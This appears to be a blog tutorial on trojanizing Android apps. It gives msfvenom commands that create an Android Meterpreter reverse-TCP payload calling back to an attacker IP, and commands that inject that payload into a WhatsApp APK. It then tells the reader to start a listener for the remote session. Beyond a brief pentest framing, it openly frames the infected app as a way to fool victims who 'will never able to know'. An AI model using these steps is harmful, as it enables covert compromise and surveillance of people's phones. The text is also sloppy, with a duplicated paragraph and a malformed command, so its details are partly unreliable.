Injecting Metasploit Payloads into Android Applications - AUTOMATICALLY
The majority of the Android applications are lacking sufficient protections around the binary and therefore an attacker can easily trojanized a legitimate application with a malicious payloads. This is one of the reasons that mobile malware is spreading so rapidly in the Android phones.
In mobile security assessments attempts to trojanized the application under the scope can be useful as a proof of concept to demonstrate to the customer the business impact in terms of reputation if their application can be used for malicious purposes.
In mobile security assessments attempts to trojanized the application under the scope can be useful as a proof of concept to demonstrate to the customer the business impact in terms of reputation if their application can be used for malicious purposes.
Payload Generation:
first of all lets see how we can generate payload (only payload) using msfvenom. I assume that you must be know about metasploit, msfconsole, msfpayload, & msfvenom(if not doesn't matter) you will learn after this post.
ok! so, let's try to generate a 'pure' malware using msfvenom.
1
2
| root@kali:~# msfvenom -p android/meterpreter/reverse_tcpLHOST=192.168.1.76 LPORT=4444 R > pentestlab.apk |
Manual Android Payload Generation. source :pentest lab.
Injecting Payloads to APK
now in msfvenom we have a function that can be use to inject our payload to a template/legit application.
for that we need to pass another parameter that is "x". for this(msfvenom) -x parameter is used to define the templete file/apk/exe.
so lets try ti build our payload with a legit application. now the question is why the hell we need this??
the answer is. a pure malware apk does not run anything by default. if you click on the icon it will flas the screen & launch the malware code so the attacker's backdoor will run on that device in order to establish the remote connection.
but, in this senario, victim is having a legit application that is working normally. so, this is easy to trick any one to convience them to use the infected app. or you can just do it, they will never able to know is there anything is going wrong with their phone or not. for lazy persons like me you guys can use the GUI interface that I already posted here
Ok! back to our business :
1
2
| root@kali:~# msfvenom -x whatsapp.apk -p android/meterpreter/reverse_tcpLHOST=192.168.1.76 LPORT=4444 -o Whatsapp_backdoored.apk |
MSFVenom will decompile the application and it will try to discover the hook point of where the payload will be injected. Furthermore it will poison the Android Manifest file of the application with additional permissions that could be used for post exploitation activities. The output can be seen below:
now, when you install this application, it will install whatsapp only, (if you already installed the app)it will replace the old one. Sounds crazy right? yeh.. it is CraZyyYYYYYYYY
once payload /application is installed in your target's phone, just launch multi handler to get the reverse connection & enjoy the show.
not happy with this??? ok read the full article form here
Comments
Post a Comment